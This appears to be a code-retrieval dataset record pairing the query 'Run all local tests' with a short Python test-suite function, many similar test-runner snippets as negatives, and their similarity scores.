method name\n for callback in self.__callbacks[self.EVENT_ON_RUN_TEST_METHOD]:\n callback(result.to_dict())\n result.start()\n\n if self.__class_level_failure:\n result.end_in_failure(self.__class_level_failure)\n elif self.__class_level_error:\n result.end_in_error(self.__class_level_error)\n else:\n # first, run setup fixtures\n self._stage = self.STAGE_SETUP\n def _setup_block():\n for fixture_method in self.setup_fixtures + [ self.setUp ]:\n fixture_method()\n self.__execute_block_recording_exceptions(_setup_block, result)\n\n def _run_test_block():\n # then run the test method itself, assuming setup was successful\n self._stage = self.STAGE_TEST_METHOD\n if not result.complete:\n self.__execute_block_recording_exceptions(test_method, result)\n\n def _setup_teardown_block():\n self.__enter_context_managers(self.setup_teardown_fixtures, _run_test_block)\n\n # then run any setup_teardown fixtures, assuming setup was successful.\n if not result.complete:\n self.__execute_block_recording_exceptions(_setup_teardown_block, result)\n\n # finally, run the teardown phase\n self._stage = self.STAGE_TEARDOWN\n def _teardown_block():\n for fixture_method in [ self.tearDown ] + self.teardown_fixtures:\n fixture_method()\n self.__execute_block_recording_exceptions(_teardown_block, result)\n\n # if nothing's gone wrong, it's not about to start\n if not result.complete:\n result.end_in_success()\n except (KeyboardInterrupt, SystemExit):\n result.end_in_interruption(sys.exc_info())\n raise\n finally:\n for callback in self.__callbacks[self.EVENT_ON_COMPLETE_TEST_METHOD]:\n callback(result.to_dict())\n\n self._method_level = False\n\n if not result.success:\n self.failure_count += 1\n if self.failure_limit and self.failure_count >= self.failure_limit:\n return", "def test_standard_tap_tests():\n tests = get_standard_tap_tests(TapPartoo, config=SAMPLE_CONFIG)\n for test in tests:\n test()", "def run_tests():\n testfiles = ['tests.test_overall']\n exclude = ['__init__.py', 'test_overall.py']\n for t in glob(pjoin('tests', '*.py')):\n if True not in [t.endswith(ex) for ex in exclude]:\n if basename(t).startswith('test_'):\n testfiles.append('tests.%s' % splitext(basename(t))[0])\n\n suites = []\n for file in testfiles:\n __import__(file)\n suites.append(sys.modules[file].suite)\n\n tests = unittest.TestSuite(suites)\n runner = unittest.TextTestRunner(verbosity=2)\n\n # Disable logging output\n logging.basicConfig(level=100)\n logging.disable(100)\n\n result = runner.run(tests)\n return result", "def run_all_unit_tests():\n original = verify.parse_content\n try:\n verify.parse_content = parse_string_in_scope\n\n test_list_of()\n\n test_activity_multiple_choice()\n test_activity_free_text()\n test_activity_multiple_choice_group()\n test_activity_ast()\n\n test_assessment()\n test_assessment_ast()\n\n # test existing verifier using parsing instead of exec/compile\n verify.test_sample_assets()\n finally:\n verify.parse_content = original", "def RunTest(self):\n self.TestLs()\n self.TestTerminate()\n self.TestMultipleProcesses()", "def runall():\n sclogic.runall()", "def unittest():\n from a6test import test_all\n test_all()", "def test_catchall():\n\n dispatcher = ntelebot.dispatch.Dispatcher()\n dispatcher.add(lambda ctx: 'DISPATCHED')\n ctx = MockContext()\n assert dispatcher(ctx) == 'DISPATCHED'", "def spec_tests():\n pass", "def run_tests(self):\n manifest = manifestparser.TestManifest(\n manifests=[os.path.join(self.repository_path, self.manifest_path)],\n strict=False)\n\n tests = manifest.active_tests(**mozinfo.info)\n self._mozmill.run(tests, self.options.restart)\n\n # Whenever a test fails it has to be marked, so we quit with the correct exit code\n self.last_failed_tests = self.last_failed_tests or self._mozmill.results.fails\n\n self.testrun_index += 1", "def do_test(self):\n\t\tshutit_global.shutit_global_object.yield_to_draw()\n\t\tif not self.build['dotest']:\n\t\t\tself.log('Tests configured off, not running',level=logging.DEBUG)\n\t\t\treturn\n\t\t# Test in reverse order\n\t\tself.log('PHASE: test', level=logging.DEBUG)\n\t\tself.stop_all()\n\t\tself.start_all()\n\t\tfor module_id in self.module_ids(rev=True):\n\t\t\t# Only test if it's installed.\n\t\t\tif self.is_installed(self.shutit_map[module_id]):\n\t\t\t\tself.log('RUNNING TEST ON: ' + module_id, level=logging.DEBUG)\n\t\t\t\tself.login(prompt_prefix=module_id,command=shutit_global.shutit_global_object.bash_startup_command,echo=False)\n\t\t\t\tif not self.shutit_map[module_id].test(self):\n\t\t\t\t\tself.fail(module_id + ' failed on test', shutit_pexpect_child=self.get_shutit_pexpect_session_from_id('target_child').pexpect_child) # pragma: no cover\n\t\t\t\tself.logout(echo=False)", "def _do_test(self):\n\n process_all_events()\n\n if self.list:\n (callback, args, kwargs) = self.list.pop(0)\n callback(*args, **kwargs)\n else:\n safe_exit(force=1)", "def test():\n import unittest\n\n tests = unittest.TestLoader().discover(\"tests\")\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test_run_all_some_rule_triggered(self, *args):\n rule1 = {\n 'conditions': 'condition1',\n 'actions': 'action name 1'\n }\n rule2 = {\n 'conditions': 'condition2',\n 'actions': 'action name 2'\n }\n variables = BaseVariables()\n actions = BaseActions()\n\n def return_action1(rule, *args, **kwargs):\n return rule['actions'] == 'action name 1'\n\n engine.run.side_effect = return_action1\n\n result = engine.run_all([rule1, rule2], variables, actions)\n self.assertTrue(result)\n self.assertEqual(engine.run.call_count, 2)\n\n # switch order and try again\n engine.run.reset_mock()\n\n result = engine.run_all([rule2, rule1], variables, actions)\n self.assertTrue(result)\n self.assertEqual(engine.run.call_count, 2)", "def test():\n import unittest\n tests = unittest.TestLoader().discover(tests)\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test_dispatch(self):\n disp = Dispatcher()\n args = (1, 2)\n res = disp.dispatch(\"working\", *args)\n self.assertEqual(res, args)", "def run_feature_extraction_tests():\n test_feature_extraction()\n test_distributed_feature_extraction()\n test_multimodel_feature_extraction()\n test_distributed_multimodel_feature_extraction()", "def main():\n run_test_summary1a()\n run_test_summary1c()\n run_test_summary1c()", "def run_suite(*test_classes):\n\n loader = unittest.TestLoader()\n suite = unittest.TestSuite()\n for test_class in test_classes:\n tests = loader.loadTestsFromTestCase(test_class)\n suite.addTests(tests)\n if suite is not None:\n unittest.TextTestRunner(verbosity=2).run(suite)\n return", "def run_test_suites(self, suites):\n for suite_class in suites:\n test_suite = suite_class(self)\n results = test_suite.run()\n self.test_results += results", "def run_combined(self):\n self.runtest_autokey()\n self.runtest_mediaresource()\n self.runtest_composite_slug()\n self.runtest_all_types()\n self.runtest_complex_types()\n self.runtest_only_key()\n self.runtest_compound_key()\n self.runtest_simple_select()\n self.runtest_paging()\n self.runtest_nav_o2o()\n self.runtest_nav_o2o_1()\n self.runtest_nav_zo2o()\n self.runtest_nav_zo2o_f()\n self.runtest_nav_zo2o_b()\n self.runtest_nav_many2o()\n self.runtest_nav_many2o_f()\n self.runtest_nav_many2o_b()\n self.runtest_nav_many2zo()\n self.runtest_nav_many2zo_f()\n self.runtest_nav_many2zo_b()\n self.runtest_nav_many2zo_r()\n self.runtest_nav_many2zo_rf()\n self.runtest_nav_many2zo_rb()\n self.runtest_nav_many2many()\n self.runtest_nav_many2many_1()\n self.runtest_nav_many2many_r()\n self.runtest_nav_many2many_r1()", "def startTestRun(self):", "def run(self):\n list_test_scenarios = self.__get_list_scenarios_in_folder()\n\n if not list_test_scenarios:\n utils.print_error(\n \"\\n{}\\n\".format(constant.ERR_CANNOT_FIND_ANY_TEST_SCENARIOS))\n exit(1)\n\n (tests_pass, tests_fail) = self.__execute_tests(list_test_scenarios)\n\n complete_message = constant.INFO_TEST_PASS_FAIL.format(\n tests_pass, tests_fail)\n\n print(complete_message)\n\n self.__execute_reporter()", "def test():\n import unittest\n testmodules = [\n 'bettermathlib_tests',\n 'randomwebapp_tests',\n ]\n suite = unittest.TestSuite()\n for t in testmodules:\n suite.addTest(unittest.defaultTestLoader.loadTestsFromName(t))\n unittest.TextTestRunner(verbosity=2).run(suite)", "def test_actions(self, actions):\n try:\n for action in actions:\n self.get_action(action['type'])(**action)\n except Exception as e:\n print('Exception: {}'.format(str(e)))", "def run(self):\n\n self.__run_class_setup_fixtures()\n self.__enter_context_managers(self.class_setup_teardown_fixtures, self.__run_test_methods)\n self.__run_class_teardown_fixtures()", "def _run_local_tests(self, *args, **kwargs):\n pass", "def test():\n test_app()\n test_pagebrowser()", "def test(self):\n for arch, python in self.python:\n self.run(f\"{python} -m pytest\")", "def run_tests(self):\n # Charm does not defer hooks so that test is not included.\n # Trigger a package change which requires a restart\n self.run_package_change_test(\n 'ovn-central',\n 'ovn-central')", "def run_tests(self):\n\n self.endurance_results = []\n self._mozmill.add_listener(self.endurance_event, eventType='mozmill.enduranceResults')\n self._mozmill.persisted['endurance'] = {'delay': self.delay,\n 'iterations': self.options.iterations,\n 'entities': self.options.entities,\n 'restart': self.options.restart}\n\n self.manifest_path = os.path.join('tests', 'endurance')\n if not self.options.reserved:\n self.manifest_path = os.path.join(self.manifest_path,\n \"manifest.ini\")\n else:\n self.manifest_path = os.path.join(self.manifest_path,\n 'reserved',\n self.options.reserved + \".ini\")\n TestRun.run_tests(self)", "def run_tests(self, cov, functionsToRun): # pragma: nested\n print(\"runed cases\")\n for context in functionsToRun:\n #print(context)\n info = context.split(\".\")\n suite_name =info[0]\n #print(suite_name)\n className = info[1]\n caseName = info[2]\n cov.start()\n suite = import_local_file(suite_name)\n #print(dir(suite))\n try:\n # Call all functions in this module\n for name in dir(suite):\n variable = getattr(suite, name)\n #print(\"variable.__name__\")\n #print(variable.__name__)\n if inspect.isclass(variable) and variable.__name__== className:\n obj = variable()\n \n memberNames = inspect.getmembers(variable,inspect.isfunction)\n \n for member in memberNames:\n if member[0].startswith('test_') and member[0] == caseName:\n \n print(context)\n getattr(obj, member[0])()\n #if inspect.isfunction(variable):\n # variable()\n finally:\n cov.stop()", "def make_all():\n\n if not MASTER.exists():\n os.makedirs(MASTER)\n members = inspect.getmembers(sys.modules[__name__])\n members = [f for f in members if 'test_' in f[0]]\n for member in members:\n print('Running %s...' % member[0], end='')\n member[1](master=True)\n print('done!')", "def make_all():\n\n if not MASTER.exists():\n os.makedirs(MASTER)\n members = inspect.getmembers(sys.modules[__name__])\n members = [f for f in members if 'test_' in f[0]]\n for member in members:\n print('Running %s...' % member[0], end='')\n member[1](master=True)\n print('done!')", "def test_basic_execution(self):", "def run_test(self):\n raise NotImplementedError", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test_all_circuit_types(self):\n for circuit_type in self.circuits:\n\n # Create a subTest for each type of circuit\n with self.subTest(circuit_type=circuit_type):\n self.check_circuit_type(circuit_type)", "def execute_tests():\n\n if len(sys.argv) > 1:\n # Filter test list based on command line requests\n tests_to_run = []\n for requested in sys.argv[1:]:\n for func, param in registered_tests:\n if param == requested:\n tests_to_run += [(func, param)]\n break\n else:\n print('Unknown test ' + requested)\n sys.exit(1)\n else:\n tests_to_run = registered_tests\n\n failing_tests = []\n for func, param in tests_to_run:\n print(param + (' ' * (OUTPUT_ALIGN - len(param))), end='')\n sys.stdout.flush()\n try:\n func(param)\n print(COLOR_GREEN + 'PASS' + COLOR_NONE)\n except KeyboardInterrupt:\n sys.exit(1)\n except TestException as exc:\n print(COLOR_RED + 'FAIL' + COLOR_NONE)\n failing_tests += [(param, exc.args[0])]\n except Exception as exc: # pylint: disable=W0703\n print(COLOR_RED + 'FAIL' + COLOR_NONE)\n failing_tests += [(param, 'Test threw exception:\\n' +\n traceback.format_exc())]\n\n if failing_tests:\n print('Failing tests:')\n for name, output in failing_tests:\n print(name)\n print(output)\n\n print(str(len(failing_tests)) + '/' +\n str(len(tests_to_run)) + ' tests failed')\n if failing_tests != []:\n sys.exit(1)", "def run_tests():\n fail = []\n okay = []\n for i in os.listdir(\".\"):\n if i.find(\"_test_\") > -1 and i.endswith(\".py\"):\n if 0 != subprocess.call(\"python \" + i, shell=True):\n fail.append(i)\n else:\n okay.append(i)\n if fail:\n print(\"[ERROR] The following %u tests failed: %r\" % (len(fail), fail))\n return False\n print(\"[DONE] All %u tests completely successfully!\" % (len(okay)))\n return True", "def main():\n test_merge_quick_sort()\n test_compare()", "def test_dispatch_all0(self):\n req1 = FakeRequest(1, False)\n req2 = FakeRequest(2, False)\n req3 = FakeRequest(3, False)\n req4 = FakeRequest(4, False)\n req5 = FakeRequest(5, False)\n\n self.request_buffer.append(req1)\n self.request_buffer.append(req2)\n self.request_buffer.append(req3)\n self.request_buffer.append(req4)\n self.request_buffer.append(req5)\n\n self.request_buffer.dispatch_all()\n\n self.assertEqual(\n [True]*5,\n [req.dispatched for req in self.request_buffer.requests]\n )", "def run_all_tests():\n successes = 0\n testsrun = 0\n testsdir = tests_dirpath()\n for test in os.listdir(testsdir):\n path = os.path.join(testsdir, test)\n if os.path.isdir(path):\n testsrun += 1\n if run_test(path):\n successes += 1\n print(\"--- %d/%d TESTS PASSED ---\" % (successes, testsrun))\n return successes == testsrun", "def run_tests(self):\n\n self.test_report = []\n\n #dict of unsorted lists\n dict_of_un_lists = self.dict_un_lists_intersection_test(self.data_dict)\n self.test_report.append(dict_of_un_lists)\n\n #dict of sets\n dict_of_sets = self.build_dict_of_sets(self.data_dict)\n self.test_report.append(self.dict_sets_intersection_test(dict_of_sets))\n\n #pandas - experimental and probably not the way to use pandas\n # dict_of_pandas = self.build_dict_of_panda_series(self.data_dict)\n # self.test_report.append(self.dicts_any_intersection_node_test(dict_of_pandas))\n\n # print results\n\n if self.verbose:\n self.print_tests_results()", "def do_test():\n for x in execute_helper(test_info,crossmap_tests):\n yield x", "def runTest(self):\n self.setUp()\n self.test_BiplaneRegistration1()", "def run_tests(self):\n # Trigger a config change which triggers a deferred hook.\n self.run_charm_change_hook_test('configure_ovs')\n\n # Trigger a package change which requires a restart\n self.run_package_change_test(\n 'openvswitch-switch',\n 'openvswitch-switch')", "def run_tests(self):\n # Trigger a config change which triggers a deferred hook.\n self.run_charm_change_hook_test('configure_ovs')\n\n # Trigger a package change which requires a restart\n self.run_package_change_test(\n 'openvswitch-switch',\n 'openvswitch-switch')", "def run(self, args):\n start_time = time.time()\n self._printer.write_update('Collecting tests ...')\n running_all_tests = False\n\n try:\n paths, all_test_names, running_all_tests = self._collect_tests(\n args)\n except IOError:\n # This is raised if --test-list doesn't exist\n return test_run_results.RunDetails(\n exit_code=exit_codes.NO_TESTS_EXIT_STATUS)\n\n test_names = self._finder.split_into_chunks(all_test_names)\n if self._options.order == 'natural':\n test_names.sort(key=self._port.test_key)\n elif self._options.order == 'random':\n test_names.sort()\n random.Random(self._options.seed).shuffle(test_names)\n elif self._options.order == 'none':\n # Restore the test order to user specified order.\n # base.tests() may change the order as it returns tests in the\n # real, external/wpt, virtual order.\n if paths:\n test_names = self._restore_order(paths, test_names)\n\n if not self._options.no_expectations:\n self._printer.write_update('Parsing expectations ...')\n self._expectations = test_expectations.TestExpectations(self._port)\n\n tests_to_run, tests_to_skip = self._prepare_lists(paths, test_names)\n\n self._printer.print_found(\n len(all_test_names), len(test_names), len(tests_to_run),\n self._options.repeat_each, self._options.iterations)\n\n # Check to make sure we're not skipping every test.\n if not tests_to_run:\n msg = 'No tests to run.'\n if self._options.zero_tests_executed_ok:\n _log.info(msg)\n # Keep executing to produce valid (but empty) results.\n else:\n _log.critical(msg)\n code = exit_codes.NO_TESTS_EXIT_STATUS\n return test_run_results.RunDetails(exit_code=code)\n\n exit_code = self._set_up_run(tests_to_run)\n if exit_code:\n return test_run_results.RunDetails(exit_code=exit_code)\n\n if self._options.num_retries is None:\n # If --test-list is passed, or if no test narrowing is specified,\n # default to 3 retries. Otherwise [e.g. if tests are being passed by\n # name], default to 0 retries.\n if self._options.test_list or len(paths) < len(test_names):\n self._options.num_retries = 3\n else:\n self._options.num_retries = 0\n\n should_retry_failures = self._options.num_retries > 0\n\n try:\n self._register_termination_handler()\n self._start_servers(tests_to_run)\n if self._options.watch:\n run_results = self._run_test_loop(tests_to_run, tests_to_skip)\n else:\n run_results = self._run_test_once(tests_to_run, tests_to_skip,\n should_retry_failures)\n initial_results, all_retry_results = run_results\n finally:\n _log.info(\"Finally stop servers and clean up\")\n self._stop_servers()\n self._clean_up_run()\n\n if self._options.no_expectations:\n return test_run_results.RunDetails(0, [], [], initial_results,\n all_retry_results)\n\n # Some crash logs can take a long time to be written out so look\n # for new logs after the test run finishes.\n self._printer.write_update('Looking for new crash logs ...')\n self._look_for_new_crash_logs(initial_results, start_time)\n for retry_attempt_results in all_retry_results:\n self._look_for_new_crash_logs(retry_attempt_results, start_time)\n\n self._printer.write_update('Summarizing results ...')\n summarized_full_results = test_run_results.summarize_results(\n self._port, self._options, self._expectations, initial_results,\n all_retry_results)\n summarized_failing_results = test_run_results.summarize_results(\n self._port,\n self._options,\n self._expectations,\n initial_results,\n all_retry_results,\n only_include_failing=True)\n run_histories = test_run_results.test_run_histories(\n self._options, self._expectations, initial_results,\n all_retry_results)\n\n exit_code = summarized_failing_results['num_regressions']\n if exit_code > exit_codes.MAX_FAILURES_EXIT_STATUS:\n _log.warning('num regressions (%d) exceeds max exit status (%d)',\n exit_code, exit_codes.MAX_FAILURES_EXIT_STATUS)\n exit_code = exit_codes.MAX_FAILURES_EXIT_STATUS\n\n if not self._options.dry_run:\n self._write_json_files(summarized_full_results,\n summarized_failing_results, initial_results,\n running_all_tests, run_histories)\n\n self._copy_results_html_file(self._artifacts_directory,\n 'results.html')\n if (initial_results.interrupt_reason is\n test_run_results.InterruptReason.EXTERNAL_SIGNAL):\n exit_code = exit_codes.INTERRUPTED_EXIT_STATUS\n else:\n if initial_results.interrupted:\n exit_code = exit_codes.EARLY_EXIT_STATUS\n if (self._options.show_results\n and (exit_code or initial_results.total_failures)):\n self._port.show_results_html_file(\n self._filesystem.join(self._artifacts_directory,\n 'results.html'))\n self._printer.print_results(time.time() - start_time,\n initial_results)\n\n return test_run_results.RunDetails(exit_code, summarized_full_results,\n summarized_failing_results,\n initial_results, all_retry_results)", "def test_dispatch(self):\r\n self.hit = False\r\n\r\n def handler(event):\r\n self.hit = True\r\n\r\n self.events.register(handler, TestEvent)\r\n \r\n self.events.dispatch(TestEvent())\r\n\r\n self.assertTrue(self.hit)", "def init(self):\n \n self._nc_session = TestBedTests.TBNetconfSession(self.log, self.loop)\n self._nc_proxy = TestBedTests.TBNetconfProxy(self._nc_session, UtCompositeYang, self.log)\n self._netconf_test_objects = []\n self._pbreq_test_objects = []\n\n for cls in NETCONF_TESTS:\n obj = cls(self._dts, self.log, self._nc_proxy, self._loop)\n yield from obj.dts_self_register()\n self._netconf_test_objects.append(obj)\n\n for cls in PBREQ_TESTS:\n obj = cls(self._dts, self.log, self._nc_proxy, self._loop)\n yield from obj.dts_self_register()\n self._pbreq_test_objects.append(obj)\n\n @asyncio.coroutine\n def run_all_tests(xact_info, action, ks_path, msg):\n ro1 = yield from self.run_tests(self._netconf_test_objects, msg.continue_on_failure)\n if ro1.failed_count is 0 or msg.continue_on_failure is True:\n ro2 = yield from self.run_tests(self._pbreq_test_objects, msg.continue_on_failure)\n\n ro = RwAgentTestbedYang.AgentTestsOp()\n ro.total_tests = ro1.total_tests + ro2.total_tests\n ro.passed_count = ro1.passed_count + ro2.passed_count\n ro.failed_count = ro1.failed_count + ro2.failed_count\n #ro.failed_tests = ro1.failed_tests + ro2.failed_tests\n\n xpath = \"O,/agt-tb:agent-tests\"\n xact_info.respond_xpath(rwdts.XactRspCode.ACK, xpath, ro)\n\n @asyncio.coroutine\n def run_all_netconf_tests(xact_info, action, ks_path, msg):\n ro = yield from self.run_tests(self._netconf_test_objects)\n xpath = \"O,/agt-tb:agent-tests\"\n xact_info.respond_xpath(rwdts.XactRspCode.ACK, xpath, ro)\n\n @asyncio.coroutine\n def run_all_pbreqs_tests(xact_info, action, ks_path, msg):\n ro = yield from self.run_tests(self._pbreq_test_objects)\n xpath = \"O,/agt-tb:agent-tests\"\n xact_info.respond_xpath(rwdts.XactRspCode.ACK, xpath, ro)\n \n # Register for all test-cases\n yield from self._dts.register(\n xpath=\"I,/agt-tb:agent-tests/agt-tb:all\",\n flags=rwdts.Flag.PUBLISHER,\n handler=rift.tasklets.DTS.RegistrationHandler(on_prepare=run_all_tests))\n\n # Register for per category all test-cases\n yield from self._dts.register(\n xpath=\"I,/agt-tb:agent-tests/agt-tb:netconf-tests/agt-tb:all\",\n flags=rwdts.Flag.PUBLISHER,\n handler=rift.tasklets.DTS.RegistrationHandler(on_prepare=run_all_netconf_tests))\n\n yield from self._dts.register(\n xpath=\"I,/agt-tb:agent-tests/agt-tb:pb-request-tests/agt-tb:all\",\n flags=rwdts.Flag.PUBLISHER,\n handler=rift.tasklets.DTS.RegistrationHandler(on_prepare=run_all_pbreqs_tests))", "def CASE10( self, main ):\n import time\n from tests.CHOTestMonkey.dependencies.events.Event import EventType\n from tests.CHOTestMonkey.dependencies.EventScheduler import EventScheduleMethod\n\n main.log.report( \"Run all enabled checks\" )\n main.log.report( \"__________________________________________________\" )\n main.case( \"Run all enabled checks\" )\n main.step( \"Run all enabled checks\" )\n main.caseResult = main.TRUE\n main.eventGenerator.triggerEvent( EventType().CHECK_ALL, EventScheduleMethod().RUN_BLOCK )\n # Wait for the scheduler to become idle before going to the next testcase\n with main.eventScheduler.idleCondition:\n while not main.eventScheduler.isIdle():\n main.eventScheduler.idleCondition.wait()\n utilities.assert_equals( expect=main.TRUE,\n actual=main.caseResult,\n onpass=\"All enabled checks passed\",\n onfail=\"Not all enabled checks passed\" )\n time.sleep( main.caseSleep )", "def run_test_cases(self):\n count = 1\n for test_case in self.test_cases:\n print(\"Running test case #%d\" % count)\n if test_case.name == 'RouteDistance':\n distance = self.get_distance_for_route(test_case.args)\n print('%s distance: %s' % (test_case.args, distance))\n elif test_case.name == 'RouteShortest':\n args = test_case.args.split('|')\n shortest_distance = self.find_shortest_path_between_cities(args[0], args[1])\n print(\"Shortest distance between %s and %s: %d\" % (args[0], args[1], shortest_distance))\n elif test_case.name == 'RouteLessThanHops':\n args = test_case.args.split('|')\n paths = self.trips_hop_constraint_bfs(args[0], args[1], int(args[2]))\n print('Paths between %s and %s with hops less than or equal to %d: %d (%s)' % (\n args[0], args[1], int(args[2]), len(paths), paths\n ))\n elif test_case.name == 'RouteEqualHops':\n args = test_case.args.split('|')\n paths = self.trips_hop_constraint_bfs(args[0], args[1], int(args[2]), equal=True)\n print('Paths between %s and %s with hops equal to %d: %d (%s)' % (\n args[0], args[1], int(args[2]), len(paths), paths\n ))\n elif test_case.name == 'RouteLessThanDistance':\n args = test_case.args.split('|')\n paths = self.trips_distance_constraint_bfs(args[0], args[1], int(args[2]))\n print('Paths between %s and %s with distance less than %d: %d (%s)' % (\n args[0], args[1], int(args[2]), len(paths), paths\n ))\n else:\n raise Exception('Unknown test case: %s' % test_case.name)\n count += 1\n print()", "def test_after_jam_step_two(self):\n for test_suite_class in self.jam_step_2_test_suite_list:\n test_suite = test_suite_class(self)\n results = test_suite.run()\n self.test_results += results", "def run_single_test(self, config):\n path_name = config['path_name']\n for request in config['request']:\n with self.subTest(request=request, test_name=config['test_name']):\n if 'args' in request:\n url = reverse(path_name, kwargs=request['args'])\n else:\n url = reverse(path_name)\n\n query_params = None\n if 'query_params' in request:\n query_params = urlencode(request['query_params'])\n url = '{}?{}'.format(url, query_params)\n\n data = None\n data_format = 'json'\n if 'data' in request:\n data = request['data']\n\n if 'data_format' in request:\n data_format = request['data_format']\n\n response_check = None\n if 'response_check' in request:\n response_check = request['response_check']\n\n self.call_api(\n url,\n data,\n self.tokens[request['user']],\n request['status'],\n config['type'],\n data_format=data_format,\n response_check=response_check)" ]
[ "0.7445618", "0.72676694", "0.72357136", "0.69886786", "0.69496655", "0.69481313", "0.6913679", "0.6835688", "0.6833541", "0.68203133", "0.68139446", "0.6779515", "0.67011243", "0.6626831", "0.66243935", "0.6614983", "0.65842265", "0.6561729", "0.6560582", "0.6522628", "0.6487395", "0.6441573", "0.6411267", "0.6393447", "0.6377413", "0.6375661", "0.635919", "0.6357565", "0.6333101", "0.6329656", "0.6311414", "0.62818956", "0.6278038", "0.6248356", "0.62319", "0.6221192", "0.6200442", "0.6184826", "0.6169045", "0.6164405", "0.61500186", "0.614703", "0.61333734", "0.613047", "0.6121119", "0.61183864", "0.6113423", "0.6111994", "0.6102002", "0.6094369", "0.60917616", "0.60893476", "0.608665", "0.60725355", "0.60693014", "0.60576034", "0.60570395", "0.6048917", "0.60480064", "0.6047662", "0.6036021", "0.6026652", "0.60247463", "0.6018374", "0.6010244", "0.6003191", "0.59893966", "0.5970744", "0.596313", "0.5961926", "0.59518117", "0.59466994", "0.59456545", "0.5942728", "0.5928756", "0.5928756", "0.5921319", "0.5914724", "0.59079313", "0.5892017", "0.5892017", "0.5892017", "0.5891779", "0.5876384", "0.5874596", "0.5873433", "0.5865875", "0.58601546", "0.5856308", "0.5856233", "0.58452326", "0.5844174", "0.5844174", "0.5843423", "0.5841481", "0.5830591", "0.58252394", "0.5821749", "0.5819941", "0.5819165" ]
0.7137783
3
Run all local tests
def local(): suite = ServiceTestSuite() suite.addTest(unittest.makeSuite(Test, 'test_local')) return suite
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _run_local_tests(self, *args, **kwargs):\n pass", "def runAll():\n\n loader = unittest.TestLoader()\n test_dir = pkg_resources.resource_filename('frvcpy.test','.')\n suite = loader.discover(test_dir)\n\n runner = unittest.TextTestRunner(verbosity=2)\n runner.run(suite)", "def main():\n run_test_all()", "def tests():\n api.local('nosetests')", "def runalltests():\n doctest.testmod()", "def run_test_suite():\n local('. fabric_factory/ve/bin/activate; fabric_factory/src/project/manage.py test')", "def runTests(self):\n \n pass", "def run_all_tests():\n remove_dbs()\n run_training_tests()\n run_custom_training_tests()\n run_training_save_tests()\n run_validation_tests()\n run_feature_extraction_tests()", "def test(self):\n for arch, python in self.python:\n self.run(f\"{python} -m pytest\")", "def run_tests(self):\n\n self.manifest_path = os.path.join('tests',\n 'remote',\n 'manifest.ini')\n TestRun.run_tests(self)", "def run_all_tests(self):\n for index in range(len(self.__test_set_list)):\n self.run_test(index)", "def run_all_unit_tests(cls):\n suites_list = []\n for test_class in cls.TESTS:\n suite = unittest.TestLoader().loadTestsFromTestCase(test_class)\n suites_list.append(suite)\n result = unittest.TextTestRunner().run(unittest.TestSuite(suites_list))\n if not result.wasSuccessful() or result.errors:\n raise Exception(result)", "def local_test():\n pass", "def run_tests(self):\n\n self.manifest_path = os.path.join('tests',\n 'functional',\n 'manifest.ini')\n TestRun.run_tests(self)", "def test_all():\n test_get_to()\n test_error_type()\n test_exchange()\n print(\"All tests passed.\")", "def RunTestAll(ss):\n ss.StopNow = False\n ss.TestAll()\n ss.Stopped()", "def run():\n\tsubsuite_list = []\n\tfor _, modname, _ in pkgutil.iter_modules(test.__path__):\n\t\tif modname.startswith(\"test_\"):\n\t\t\tmodule = importlib.import_module('test.' + modname)\n\t\t\tsubsuite = unittest.TestLoader().loadTestsFromModule(module)\n\t\t\tsubsuite_list.append(subsuite)\n\tsuite = unittest.TestSuite(subsuite_list)\n\n\tprint(\"Testing:\\n\")\n\tunittest.TextTestRunner(verbosity=2).run(suite)", "def runtests():\n #- Load all TestCase classes from desistar/test/test_*.py\n tests = desistar_test_suite()\n #- Run them\n unittest.TextTestRunner(verbosity=2).run(tests)", "def run_tests():\n testfiles = ['tests.test_overall']\n exclude = ['__init__.py', 'test_overall.py']\n for t in glob(pjoin('tests', '*.py')):\n if True not in [t.endswith(ex) for ex in exclude]:\n if basename(t).startswith('test_'):\n testfiles.append('tests.%s' % splitext(basename(t))[0])\n\n suites = []\n for file in testfiles:\n __import__(file)\n suites.append(sys.modules[file].suite)\n\n tests = unittest.TestSuite(suites)\n runner = unittest.TextTestRunner(verbosity=2)\n\n # Disable logging output\n logging.basicConfig(level=100)\n logging.disable(100)\n\n result = runner.run(tests)\n return result", "def run_tests():\n fail = []\n okay = []\n for i in os.listdir(\".\"):\n if i.find(\"_test_\") > -1 and i.endswith(\".py\"):\n if 0 != subprocess.call(\"python \" + i, shell=True):\n fail.append(i)\n else:\n okay.append(i)\n if fail:\n print(\"[ERROR] The following %u tests failed: %r\" % (len(fail), fail))\n return False\n print(\"[DONE] All %u tests completely successfully!\" % (len(okay)))\n return True", "def run_all_tests(self) -> None:\n self.run_trt_precision_tests()\n logging.info(\"Check analysis result at: %s\", self._output_dir)", "def tests():", "def test():\n for cmd in [\n \"pytest --verbose --cov pike/ --cov-report term --cov-report html tests/\",\n ]:\n _run_in_venv(shlex.split(cmd))\n for linter in [[\"black\", \"--check\"], [\"flake8\"], [\"isort\", \"--check\"]]:\n _run_in_venv(linter + TEST_FILES)\n\n _run_in_venv(\n [\"mypy\", \"pike/\", \"tests/\", \"setup.py\", \"pikefile.py\", \"--show-error-codes\"]\n )\n _run_in_venv([\"mypy\", \"examples/\"])\n _run_in_venv([\"bandit\", \"-r\", \"pike/\"])", "def _run_ci_test():\n _run_install(False)\n _run_coverage_html(False)\n _run_typecheck_xml(False)\n _run_lint(True)", "def runtests(ctx):\n run('pytest -s tests', pty=pty_available)\n run('flake8 --ignore E265,E266,E501 --exclude src, lib', pty=pty_available)", "def doAllTests(self):\n # Initial offset\n self.getAlertsFile()\n self.offset = self.getOffset(self.config.get('PATHS', 'tempfile'))\n\n # Do all tests\n # As the socket is not persistent, client side attacks have to be done before all tests\n for module in self.modules:\n # Test is performed only if selected in config.cfg\n if self.config.get('TESTS', module[1]) == '1':\n print \"\\n%s\\n------------\" % module[0].upper()\n if module[1]=='clientSideAttacks':\n self.doClientSideAttacksTest( clientSideAttacks.ClientSideAttacks(self._target).getPayloads() )\n# elif 